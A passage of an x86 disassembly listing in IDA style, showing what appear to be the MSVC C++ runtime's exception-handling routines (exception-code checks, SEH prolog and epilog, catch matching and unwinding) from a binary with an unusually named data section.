jnz short loc_40B10B
mov eax, esi
shl eax, 10h
or esi, eax
loc_40B10B: ; CODE XREF: sub_40B08A+74�j
; sub_40B08A+78�j
mov ds:dword_423064, esi
not esi
mov ds:dword_423068, esi
pop esi
loc_40B11A: ; CODE XREF: sub_40B08A+2E�j
pop edi
pop ebx
leave
retn
sub_40B08A endp
; =============== S U B R O U T I N E =======================================
sub_40B11E proc near ; DATA XREF: sub_40B18A�o
; .kSjx934:00423060�o ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
mov eax, [edi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B157
cmp dword ptr [eax+10h], 3
jnz short loc_40B157
mov eax, [eax+14h]
cmp eax, 19930520h
jz short loc_40B152
cmp eax, 19930521h
jz short loc_40B152
cmp eax, 19930522h
jz short loc_40B152
cmp eax, 1994000h
jnz short loc_40B157
loc_40B152: ; CODE XREF: sub_40B11E+1D�j
; sub_40B11E+24�j ...
call sub_40BE59
loc_40B157: ; CODE XREF: sub_40B11E+D�j
; sub_40B11E+13�j ...
cmp ds:byte_426408, 0
push esi
jz short loc_40B183
push ds:dword_426404
call sub_405193
mov esi, eax
test esi, esi
pop ecx
jz short loc_40B183
push esi
call sub_4101B0
test eax, eax
pop ecx
jz short loc_40B183
push edi
call esi
jmp short loc_40B185
; ---------------------------------------------------------------------------
loc_40B183: ; CODE XREF: sub_40B11E+41�j
; sub_40B11E+53�j ...
xor eax, eax
loc_40B185: ; CODE XREF: sub_40B11E+63�j
pop esi
pop edi
retn 4
sub_40B11E endp
; =============== S U B R O U T I N E =======================================
sub_40B18A proc near ; DATA XREF: .kSjx934:0041D2D4�o
push offset sub_40B11E
call ds:dword_41D19C
push eax
call sub_405127
mov ds:dword_426404, eax
pop ecx
mov ds:byte_426408, 1
xor eax, eax
retn
sub_40B18A endp
; =============== S U B R O U T I N E =======================================
sub_40B1AB proc near ; DATA XREF: .kSjx934:0041D2F0�o
cmp ds:byte_426408, 0
jz short locret_40B1CE
push ds:dword_426404
call sub_405193
pop ecx
push eax
call ds:dword_41D19C
mov ds:byte_426408, 0
locret_40B1CE: ; CODE XREF: sub_40B1AB+7�j
retn
sub_40B1AB endp
; =============== S U B R O U T I N E =======================================
sub_40B1CF proc near ; DATA XREF: .kSjx934:004216E8�o
mov dword ptr [ecx], offset off_41DC24
jmp sub_402CCA
sub_40B1CF endp
; ---------------------------------------------------------------------------
loc_40B1DA: ; DATA XREF: .kSjx934:off_41DC24�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41DC24
call sub_402CCA
test byte ptr [esp+8], 1
jz short loc_40B1F6
push esi
call sub_402F6D
pop ecx
loc_40B1F6: ; CODE XREF: .kSjx934:0040B1ED�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_40B1FC proc near ; CODE XREF: sub_40B43B+4E�p
; sub_40BA07+21A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_40B252
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_40B252
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_40B230
add ecx, 8
push ecx
push edx
call sub_407FD0
test eax, eax
pop ecx
pop ecx
jz short loc_40B230
loc_40B22C: ; CODE XREF: sub_40B1FC+3C�j
; sub_40B1FC+4B�j ...
xor eax, eax
jmp short loc_40B255
; ---------------------------------------------------------------------------
loc_40B230: ; CODE XREF: sub_40B1FC+1E�j
; sub_40B1FC+2E�j
test byte ptr [esi], 2
jz short loc_40B23A
test byte ptr [edi], 8
jz short loc_40B22C
loc_40B23A: ; CODE XREF: sub_40B1FC+37�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_40B249
test byte ptr [edi], 1
jz short loc_40B22C
loc_40B249: ; CODE XREF: sub_40B1FC+46�j
test al, 2
jz short loc_40B252
test byte ptr [edi], 2
jz short loc_40B22C
loc_40B252: ; CODE XREF: sub_40B1FC+B�j
; sub_40B1FC+13�j ...
xor eax, eax
inc eax
loc_40B255: ; CODE XREF: sub_40B1FC+32�j
pop edi
pop esi
retn
sub_40B1FC endp
; =============== S U B R O U T I N E =======================================
sub_40B258 proc near ; CODE XREF: sub_40B29C+85�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0E0434F4Dh
jz short loc_40B27F
cmp eax, 0E06D7363h
jnz short loc_40B299
call sub_40539D
and dword ptr [eax+90h], 0
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B27F: ; CODE XREF: sub_40B258+D�j
call sub_40539D
cmp dword ptr [eax+90h], 0
jle short loc_40B299
call sub_40539D
add eax, 90h
dec dword ptr [eax]
loc_40B299: ; CODE XREF: sub_40B258+14�j
; sub_40B258+33�j
xor eax, eax
retn
sub_40B258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B29C proc near ; CODE XREF: sub_40B4FD+EC�p
; sub_40B8A9+36�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset dword_4215E0
call __SEH_prolog4
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
cmp dword ptr [edi+4], 80h
jg short loc_40B2BD
movsx esi, byte ptr [ebx+8]
jmp short loc_40B2C0
; ---------------------------------------------------------------------------
loc_40B2BD: ; CODE XREF: sub_40B29C+19�j
mov esi, [ebx+8]
loc_40B2C0: ; CODE XREF: sub_40B29C+1F�j
mov [ebp+var_1C], esi
call sub_40539D
add eax, 90h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
loc_40B2D3: ; CODE XREF: sub_40B29C+9F�j
cmp esi, [ebp+arg_C]
jz short loc_40B33D
cmp esi, 0FFFFFFFFh
jle short loc_40B2E2
cmp esi, [edi+4]
jl short loc_40B2E7
loc_40B2E2: ; CODE XREF: sub_40B29C+3F�j
call sub_40BEA5
loc_40B2E7: ; CODE XREF: sub_40B29C+44�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_40B318
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_40BEF0
loc_40B318: ; CODE XREF: sub_40B29C+65�j
and [ebp+ms_exc.disabled], 0
jmp short loc_40B338
; ---------------------------------------------------------------------------
loc_40B31E: ; DATA XREF: .kSjx934:00421600�o
push [ebp+ms_exc.exc_ptr]
call sub_40B258
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40B328: ; DATA XREF: .kSjx934:00421604�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_40B338: ; CODE XREF: sub_40B29C+80�j
mov [ebp+var_1C], esi
jmp short loc_40B2D3
; ---------------------------------------------------------------------------
loc_40B33D: ; CODE XREF: sub_40B29C+3A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40B362
cmp esi, [ebp+arg_C]
jz short loc_40B353
call sub_40BEA5
loc_40B353: ; CODE XREF: sub_40B29C+B0�j
mov [ebx+8], esi
call __SEH_epilog4
retn
sub_40B29C endp
; =============== S U B R O U T I N E =======================================
sub_40B35C proc near ; DATA XREF: .kSjx934:004215F8�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_40B35C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B362 proc near ; CODE XREF: sub_40B29C+A8�p
call sub_40539D
cmp dword ptr [eax+90h], 0
jle short locret_40B37C
call sub_40539D
add eax, 90h
dec dword ptr [eax]
locret_40B37C: ; CODE XREF: sub_40B362+C�j
retn
sub_40B362 endp
; =============== S U B R O U T I N E =======================================
sub_40B37D proc near ; CODE XREF: sub_40B4FD+93�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_40B3BF
cmp dword ptr [eax+10h], 3
jnz short loc_40B3BF
mov ecx, [eax+14h]
cmp ecx, 19930520h
jz short loc_40B3A8
cmp ecx, 19930521h
jz short loc_40B3A8
cmp ecx, 19930522h
jnz short loc_40B3BF
loc_40B3A8: ; CODE XREF: sub_40B37D+19�j
; sub_40B37D+21�j
cmp dword ptr [eax+1Ch], 0
jnz short loc_40B3BF
call sub_40539D
xor ecx, ecx
inc ecx
mov [eax+20Ch], ecx
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40B3BF: ; CODE XREF: sub_40B37D+8�j
; sub_40B37D+E�j ...
xor eax, eax
retn
sub_40B37D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B3C2 proc near ; CODE XREF: sub_406640+112�p
; sub_40B623+6E�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421608
call __SEH_prolog4
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short loc_40B3FF
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40B3FF
mov eax, [ecx+1Ch]
test eax, eax
jz short loc_40B3FF
mov eax, [eax+4]
test eax, eax
jz short loc_40B3FF
and [ebp+ms_exc.disabled], 0
push eax
push dword ptr [ecx+18h]
call sub_404235
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40B3FF: ; CODE XREF: sub_40B3C2+11�j
; sub_40B3C2+19�j ...
call __SEH_epilog4
retn
sub_40B3C2 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40BE59
; =============== S U B R O U T I N E =======================================
sub_40B416 proc near ; CODE XREF: sub_40B699+86�p
; sub_40B699+113�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [ecx]
push esi
mov esi, [esp+4+arg_0]
add eax, esi
cmp dword ptr [ecx+4], 0
jl short loc_40B439
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_40B439: ; CODE XREF: sub_40B416+11�j
pop esi
retn
sub_40B416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B43B proc near ; CODE XREF: sub_40BA07+111�p
; sub_40BA07+2AE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
test edi, edi
jnz short loc_40B44F
call sub_40BEA5
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B44F: ; CODE XREF: sub_40B43B+8�j
and [ebp+var_8], 0
cmp dword ptr [edi], 0
mov [ebp+var_1], 0
jle short loc_40B4AF
push ebx
push esi
loc_40B45E: ; CODE XREF: sub_40B43B+70�j
mov eax, [ebp+arg_0]
mov eax, [eax+1Ch]
mov eax, [eax+0Ch]
mov ebx, [eax]
test ebx, ebx
lea esi, [eax+4]
jle short loc_40B4A3
mov eax, [ebp+var_8]
shl eax, 4
mov [ebp+var_C], eax
loc_40B479: ; CODE XREF: sub_40B43B+60�j
mov ecx, [ebp+arg_0]
push dword ptr [ecx+1Ch]
mov eax, [esi]
push eax
mov eax, [edi+4]
add eax, [ebp+var_C]
push eax
call sub_40B1FC
add esp, 0Ch
test eax, eax
jnz short loc_40B49F
dec ebx
add esi, 4
test ebx, ebx
jg short loc_40B479
jmp short loc_40B4A3
; ---------------------------------------------------------------------------
loc_40B49F: ; CODE XREF: sub_40B43B+58�j
mov [ebp+var_1], 1
loc_40B4A3: ; CODE XREF: sub_40B43B+33�j
; sub_40B43B+62�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [edi]
jl short loc_40B45E
pop esi
pop ebx
loc_40B4AF: ; CODE XREF: sub_40B43B+1F�j
mov al, [ebp+var_1]
leave
retn
sub_40B43B endp
; =============== S U B R O U T I N E =======================================
sub_40B4B4 proc near ; CODE XREF: sub_40BA07+30A�p
push 4
mov eax, offset loc_41C1EE
call sub_4045FF
call sub_40539D
cmp dword ptr [eax+94h], 0
jz short loc_40B4D3
call sub_40BEA5
loc_40B4D3: ; CODE XREF: sub_40B4B4+18�j
and dword ptr [ebp-4], 0
call sub_40BE92
or dword ptr [ebp-4], 0FFFFFFFFh
jmp sub_40BE59
sub_40B4B4 endp
; =============== S U B R O U T I N E =======================================
sub_40B4E5 proc near ; DATA XREF: .kSjx934:00421630�o
call sub_40539D
mov ecx, [ebp+8]
push 0
push 0
mov [eax+94h], ecx
call sub_4041BB
int 3 ; Trap to Debugger
sub_40B4E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4FD proc near ; CODE XREF: sub_40B8A9+57�p
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0040B618 SIZE 00000005 BYTES
push 2Ch
push offset dword_421680
call __SEH_prolog4
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_34], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_3C]
push eax
call sub_4044D9
pop ecx
pop ecx
mov [ebp+var_28], eax
call sub_40539D
mov eax, [eax+88h]
mov [ebp+var_2C], eax
call sub_40539D
mov eax, [eax+8Ch]
mov [ebp+var_30], eax
call sub_40539D
mov [eax+88h], esi
call sub_40539D
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
and [ebp+ms_exc.disabled], 0
xor eax, eax
inc eax
mov [ebp+arg_8], eax
mov [ebp+ms_exc.disabled], eax
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_40456E
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp short loc_40B5FC
; ---------------------------------------------------------------------------
loc_40B58D: ; DATA XREF: .kSjx934:004216A0�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_40B37D
retn
; ---------------------------------------------------------------------------
loc_40B596: ; DATA XREF: .kSjx934:004216A4�o
mov esp, [ebp+ms_exc.old_esp]
call sub_40539D
and dword ptr [eax+20Ch], 0
mov esi, [ebp+arg_C]
mov edi, [ebp+arg_4]
cmp dword ptr [esi+4], 80h
jg short loc_40B5BA
movsx ecx, byte ptr [edi+8]
jmp short loc_40B5BD
; ---------------------------------------------------------------------------
loc_40B5BA: ; CODE XREF: sub_40B4FD+B5�j
mov ecx, [edi+8]
loc_40B5BD: ; CODE XREF: sub_40B4FD+BB�j
mov ebx, [esi+10h]
and [ebp+var_20], 0
loc_40B5C4: ; CODE XREF: sub_40B4FD+11E�j
mov eax, [ebp+var_20]
cmp eax, [esi+0Ch]
jnb short loc_40B5E4
imul eax, 14h
add eax, ebx
mov edx, [eax+4]
cmp ecx, edx
jle short loc_40B618
cmp ecx, [eax+8]
jg short loc_40B618
mov eax, [esi+8]
mov ecx, [eax+edx*8+8]
loc_40B5E4: ; CODE XREF: sub_40B4FD+CD�j
push ecx
push esi
push 0
push edi
call sub_40B29C
add esp, 10h
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
loc_40B5FC: ; CODE XREF: sub_40B4FD+8E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov [ebp+arg_8], 0
call sub_40B623
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40B4FD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40B4FD
loc_40B618: ; CODE XREF: sub_40B4FD+D9�j
; sub_40B4FD+DE�j
inc [ebp+var_20]
jmp short loc_40B5C4
; END OF FUNCTION CHUNK FOR sub_40B4FD
; =============== S U B R O U T I N E =======================================
sub_40B61D proc near ; DATA XREF: .kSjx934:00421698�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_40B61D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B623 proc near ; CODE XREF: sub_40B4FD+10D�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-28h]
call sub_404522
pop ecx
call sub_40539D
mov ecx, [ebp-2Ch]
mov [eax+88h], ecx
call sub_40539D
mov ecx, [ebp-30h]
mov [eax+8Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_40B698
cmp dword ptr [esi+10h], 3
jnz short locret_40B698
mov eax, [esi+14h]
cmp eax, 19930520h
jz short loc_40B674
cmp eax, 19930521h
jz short loc_40B674
cmp eax, 19930522h
jnz short locret_40B698
loc_40B674: ; CODE XREF: sub_40B623+41�j
; sub_40B623+48�j
cmp dword ptr [ebp-34h], 0
jnz short locret_40B698
cmp dword ptr [ebp-1Ch], 0
jz short locret_40B698
push dword ptr [esi+18h]
call sub_404501
pop ecx
test eax, eax
jz short locret_40B698
push dword ptr [ebp+10h]
push esi
call sub_40B3C2
pop ecx
pop ecx
locret_40B698: ; CODE XREF: sub_40B623+31�j
; sub_40B623+37�j ...
retn
sub_40B623 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B699 proc near ; CODE XREF: sub_40B818+36�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset dword_4216A8
call __SEH_prolog4
xor edx, edx
mov [ebp+var_1C], edx
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
cmp ecx, edx
jz loc_40B810
cmp [ecx+8], dl
jz loc_40B810
mov ecx, [eax+8]
cmp ecx, edx
jnz short loc_40B6D4
test dword ptr [eax], 80000000h
jz loc_40B810
loc_40B6D4: ; CODE XREF: sub_40B699+2D�j
mov eax, [eax]
mov esi, [ebp+arg_4]
test eax, eax
js short loc_40B6E1
lea esi, [ecx+esi+0Ch]
loc_40B6E1: ; CODE XREF: sub_40B699+42�j
mov [ebp+ms_exc.disabled], edx
xor ebx, ebx
inc ebx
push ebx
test al, 8
jz short loc_40B72D
mov edi, [ebp+arg_0]
push dword ptr [edi+18h]
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
mov eax, [edi+18h]
mov [esi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_40B71E: ; CODE XREF: sub_40B699+E7�j
push eax
call sub_40B416
pop ecx
pop ecx
mov [esi], eax
jmp loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B72D: ; CODE XREF: sub_40B699+51�j
mov edi, [ebp+arg_C]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
test [edi], bl
jz short loc_40B782
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz loc_40B7F3
push dword ptr [edi+14h]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push esi
call sub_407370
add esp, 0Ch
cmp dword ptr [edi+14h], 4
jnz loc_40B7F8
mov eax, [esi]
test eax, eax
jz short loc_40B7F8
add edi, 8
push edi
jmp short loc_40B71E
; ---------------------------------------------------------------------------
loc_40B782: ; CODE XREF: sub_40B699+9F�j
cmp [edi+18h], edx
jnz short loc_40B7BF
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push dword ptr [edi+14h]
add edi, 8
push edi
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push esi
call sub_407370
add esp, 0Ch
jmp short loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B7BF: ; CODE XREF: sub_40B699+EC�j
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push ebx
push esi
call sub_4101B0
pop ecx
pop ecx
test eax, eax
jz short loc_40B7F3
push dword ptr [edi+18h]
call sub_4101B0
pop ecx
test eax, eax
jz short loc_40B7F3
test byte ptr [edi], 4
push 0
pop eax
setnz al
inc eax
mov [ebp+var_1C], eax
jmp short loc_40B7F8
; ---------------------------------------------------------------------------
loc_40B7F3: ; CODE XREF: sub_40B699+62�j
; sub_40B699+73�j ...
call sub_40BEA5
loc_40B7F8: ; CODE XREF: sub_40B699+8F�j
; sub_40B699+D7�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
jmp short loc_40B812
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
jmp sub_40BE59
; ---------------------------------------------------------------------------
loc_40B810: ; CODE XREF: sub_40B699+19�j
; sub_40B699+22�j ...
xor eax, eax
loc_40B812: ; CODE XREF: sub_40B699+169�j
call __SEH_epilog4
retn
sub_40B699 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B818 proc near ; CODE XREF: sub_40B8A9+11�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 8
push offset dword_4216C8
call __SEH_prolog4
mov eax, [ebp+arg_8]
test dword ptr [eax], 80000000h
jz short loc_40B834
mov ebx, [ebp+arg_4]
jmp short loc_40B83E
; ---------------------------------------------------------------------------
loc_40B834: ; CODE XREF: sub_40B818+15�j
mov ecx, [eax+8]
mov edx, [ebp+arg_4]
lea ebx, [ecx+edx+0Ch]
loc_40B83E: ; CODE XREF: sub_40B818+1A�j
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_C]
push esi
push eax
push [ebp+arg_4]
mov edi, [ebp+arg_0]
push edi
call sub_40B699
add esp, 10h
dec eax
jz short loc_40B878
dec eax
jnz short loc_40B890
push 1
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_404235
jmp short loc_40B890
; ---------------------------------------------------------------------------
loc_40B878: ; CODE XREF: sub_40B818+3F�j
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B416
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_404235
loc_40B890: ; CODE XREF: sub_40B818+42�j
; sub_40B818+5E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call __SEH_epilog4
retn
sub_40B818 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40BE59
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B8A9 proc near ; CODE XREF: sub_40B915+D4�p
; sub_40BA07+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
cmp [ebp+arg_10], 0
jz short loc_40B8C2
push [ebp+arg_10]
push ebx
push esi
push [ebp+arg_0]
call sub_40B818
add esp, 10h
loc_40B8C2: ; CODE XREF: sub_40B8A9+7�j
cmp [ebp+arg_18], 0
push [ebp+arg_0]
jnz short loc_40B8CE
push esi
jmp short loc_40B8D1
; ---------------------------------------------------------------------------
loc_40B8CE: ; CODE XREF: sub_40B8A9+20�j
push [ebp+arg_18]
loc_40B8D1: ; CODE XREF: sub_40B8A9+23�j
call sub_40423C
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_40B29C
mov eax, [edi+4]
push 100h
push [ebp+arg_14]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_40B4FD
add esp, 28h
test eax, eax
jz short loc_40B913
push esi
push eax
call sub_404205
loc_40B913: ; CODE XREF: sub_40B8A9+61�j
pop ebp
retn
sub_40B8A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B915 proc near ; CODE XREF: sub_40BA07+336�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_40BA04
push edi
call sub_40539D
cmp dword ptr [eax+80h], 0
jz short loc_40B978
call sub_40539D
lea edi, [eax+80h]
call sub_40518A
cmp [edi], eax
jz short loc_40B978
cmp dword ptr [esi], 0E0434F4Dh
jz short loc_40B978
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4042F4
add esp, 1Ch
test eax, eax
jnz loc_40BA03
loc_40B978: ; CODE XREF: sub_40B915+22�j
; sub_40B915+36�j ...
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jnz short loc_40B986
call sub_40BEA5
loc_40B986: ; CODE XREF: sub_40B915+6A�j
mov esi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push edi
call sub_404466
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_40BA03
push ebx
loc_40B9A9: ; CODE XREF: sub_40B915+EB�j
cmp esi, [edi]
jl short loc_40B9F4
cmp esi, [edi+4]
jg short loc_40B9F4
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_40B9CA
cmp byte ptr [ecx+8], 0
jnz short loc_40B9F4
loc_40B9CA: ; CODE XREF: sub_40B915+AD�j
lea ebx, [eax-10h]
test byte ptr [ebx], 40h
jnz short loc_40B9F4
push [ebp+arg_1C]
mov esi, [ebp+arg_4]
push [ebp+arg_18]
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_40B8A9
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_40B9F4: ; CODE XREF: sub_40B915+96�j
; sub_40B915+9B�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_40B9A9
pop ebx
loc_40BA03: ; CODE XREF: sub_40B915+5D�j
; sub_40B915+91�j
pop edi
loc_40BA04: ; CODE XREF: sub_40B915+F�j
pop esi
leave
retn
sub_40B915 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA07 proc near ; CODE XREF: sub_40BD75+D4�p
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 2Ch
mov ecx, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_10]
mov eax, [ebx+4]
cmp eax, 80h
push esi
push edi
mov [ebp+var_1], 0
jg short loc_40BA2A
movsx ecx, byte ptr [ecx+8]
jmp short loc_40BA2D
; ---------------------------------------------------------------------------
loc_40BA2A: ; CODE XREF: sub_40BA07+1B�j
mov ecx, [ecx+8]
loc_40BA2D: ; CODE XREF: sub_40BA07+21�j
cmp ecx, 0FFFFFFFFh
mov [ebp+var_8], ecx
jl short loc_40BA39
cmp ecx, eax
jl short loc_40BA3E
loc_40BA39: ; CODE XREF: sub_40BA07+2C�j
call sub_40BEA5
loc_40BA3E: ; CODE XREF: sub_40BA07+30�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
cmp [esi], edi
jnz loc_40BD19
cmp dword ptr [esi+10h], 3
mov ebx, 19930520h
jnz loc_40BB86
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BA76
cmp eax, 19930521h
jz short loc_40BA76
cmp eax, 19930522h
jnz loc_40BB86
loc_40BA76: ; CODE XREF: sub_40BA07+5B�j
; sub_40BA07+62�j
cmp dword ptr [esi+1Ch], 0
jnz loc_40BB86
call sub_40539D
cmp dword ptr [eax+88h], 0
jz loc_40BD58
call sub_40539D
mov esi, [eax+88h]
